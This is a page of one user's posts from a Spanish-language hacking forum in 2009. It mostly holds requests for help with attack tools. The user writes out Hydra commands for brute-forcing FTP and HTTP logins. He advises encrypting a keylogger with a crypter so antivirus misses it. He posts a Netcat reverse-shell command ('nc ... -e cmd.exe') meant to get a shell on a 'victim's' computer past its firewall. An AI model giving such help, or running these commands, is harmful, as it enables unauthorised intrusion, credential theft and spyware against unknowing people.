elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Hacking / Re: Problema con Hydra en: 9 Diciembre 2009, 17:44 pm
¿En serio?, creia que eso era solo para el protocolo POP3 entonces ¿para qué valen herramientas como Hydra o Brutus? bueno, he revisado los parametros y estan bien, aparte los he contrastado con algunos comandos que he visto en videos de Youtube y nada  :-\ Bueno si alguien sabe que falla que me lo diga porfavor  :P

Saludos!
12  Seguridad Informática / Hacking / Re: problema con keylogger [Ayuda] en: 9 Diciembre 2009, 08:09 am
Te vas a configuración y lo desactivas temporalmete  ;)

Si lo que quieres es que no lo detecte ningun AV lo tienes que cifrar con un crypter

Saludos!
13  Seguridad Informática / Nivel Web / Re: conceptos básicos en: 9 Diciembre 2009, 01:05 am
Si quieres ir un paso por delante de los hackers has de ir por delante de ellos, esto quiere decir que un hacker ha de saber protocolos TCP/UDP tipos de escaneos (SYN, ACK, etc.) PHP, HTML (Obvio), SQL, MySQL,etc. esto quiere decir que si quiere que tu web sea segura has de saber mucho, o sino iras perdido =T asi que aprende mucho (protocolos, tipos de escaneos, etc.), aprende programación y desarrollo web y bajate las ultimas versiones del sistema de foro (en caso de que sea un foro) que uses (Ej.:SMF-Bajate su última versión) Si sabes todo eso tendrás una web muy segura y probablemte seas un defacer en potencia  ::)

Saludos!
14  Seguridad Informática / Hacking / Problema con Hydra en: 8 Diciembre 2009, 22:18 pm
Hola otra vez xD. Vereis tengo un problema con Hydra he buscado por google pero no hay casi tutos asique hice un hydra -h y me puse a ello xD. El caso es que cuando pongo en la consola

Hydra -l password.txt -p password.txt -e ns -o Test.txt -t 10 -vV [IP] ftp

Me sale lo siguiente (el espacio negro después del -vV es la IP, solo que preferí no enseñarla)



¿Porqué me sale ese error? no se si tiene algo que ver pero tengo una conexión Wi-fi

Otro fallo que me sale es cuando pongo http-get, donde me pone:

Citar
C:\Documents and Settings\Ruben\Escritorio\hydra>Hydra -l password.txt -p password.txt -e ns -o Test.txt -t 10 -vV 173.*.*.* http-get
Error: You must supply the web page as an additional option or via -m

Si aparte de resolverme la duda alguien tiene un tutorial sobre todas las opciones de Hydra se lo agradecería  :)

Saludos!
15  Seguridad Informática / Hacking / Re: Problema con Netcat en: 7 Diciembre 2009, 16:15 pm
Ya, más o menos te entendí, voy a ver si creo un .bat, el cual debe mover el NC a System32 y una vez alli que se ejecuye la cadenas de comandos no?

Saludos!
16  Seguridad Informática / Hacking / Problema con Netcat en: 7 Diciembre 2009, 15:50 pm
Hola buenas, vereis tengo una duda sobre Netcat vereis pretendo conseguir shell en el ordenador de una persona mediante Netcat y una conexión Inversa es decir que el se conecte a mi y asi evito que salte el Firewall de mi víctima  ;D , pero me surge un problema como se donde esta nc para que al activar el codigo:

"nc 192.168.*.* 666 -e cmd.exe"

Y que asi se conecte a mi ordenador con el código:

"nc  -v -l -p 666"

Es que si no se donde lo guarda no puedo usar ese comando y por ello no me puedo conectar  :-\. Gracias por la ayuda

Saludos!
17  Seguridad Informática / Nivel Web / Re: ¿Cuá es el más usado? en: 30 Noviembre 2009, 22:53 pm
Ya veo, pero me refiero a tecnicas usadas a nivel web sin uso de auditorias, ni uso de exploits que se compilen

Saludos!
18  Seguridad Informática / Nivel Web / Re: ¿Cuá es el más usado? en: 30 Noviembre 2009, 21:28 pm
Si eso lo entiendo, pero es una encuesta sobre vulnerabilidades a nivel web más usadas en este año (2009) no digo nada de Hackers aunque te he entendido lo que quieres decir. Pondré tu voto en otros  :P

Saludos!
19  Media / Diseño Gráfico / Re: elhacker.net te necesita ´´ICONOS!!´´ para la wiki/labs en: 30 Noviembre 2009, 20:58 pm
Hola, vereis me apetece ayudar al foro, y porque no hacer un logo, mi pregunta es ¿he de seguir con la misma font, colores, etc. del foro? Porque tengo un logo en mente pero es de otro estilo, no se si me entendeis xD.¿ Una vez realizado lo pongo aquí o a quien se lo envio?

Saludos!
20  Seguridad Informática / Nivel Web / ¿Cuá es el más usado? en: 30 Noviembre 2009, 20:54 pm
Hola buenas, querría hacer una especir de encuesta sobre cual es el bug que más explotan los usuarios de Elhacker.net, para hacer una encuesta sobre cuales son los más usados.

La encuesta es simple, aveis de responder cual es el bug que más usais a nivel web, (RFI, LFI, SQL Injection, XSS) y una vez tenga la encuesta contrastada con otros foros "Underground" mostraré cual ha sido la vulnerabilidad más explotada y/o más usada en 2009.

Desde ya gracias por la colaboración.

Saludos!
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines